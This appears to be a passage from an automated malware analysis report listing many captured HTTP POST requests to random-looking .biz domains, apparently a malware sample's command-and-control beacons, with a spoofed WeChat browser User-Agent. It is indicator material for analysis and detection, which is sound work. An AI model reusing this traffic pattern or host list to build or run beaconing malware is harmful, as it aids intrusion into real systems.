                Source: global trafficHTTP traffic detected: POST /aiql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /yqqmngrjnxvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /exygmnocmwksy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vbohqiwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /yjcuxjh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rwfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /levm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /opxc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /aldycdkjcqrlqwgv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /kuspgbuc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ixcw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /yvoikxldsfcfgso HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ugrdtwtacn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /exeqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /dknfakeq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /mmqkhapthxjsnh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ndtogcedgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hkulo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /sdsuahsrg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /otgkntfmpmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /umcybsxuaomkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ilidqggw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /digagk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /iiuonvofxn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /nroqcaxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nuoraorjkrhft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /krrofgdqsat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /smeisoexdoewo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /yhsygfwinibyek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /tdfnnvngg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ydwthbku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jmryxuilbmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vbgexw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /flarmrvjgo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /iatkorfmnwf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /cmvqnkktnlmsiyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vkwyeg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /tflprvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ybbogla HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /cgoaec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qvm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /vatx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /cuqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /kiywguufjdpqtpf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ehquov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vppkcegilvgf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /fkax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /kkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gqqjufjjpxhxqwb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /obdt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /pirbxlgko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /uvrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xvbdrvgarw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /rxnqqlqsl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /wxnfkxfh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /cjwsbx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qcbsfnonovikje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /lrywafs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hbcdkqyacacfvqqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hnpfnrirpigau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /goxnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
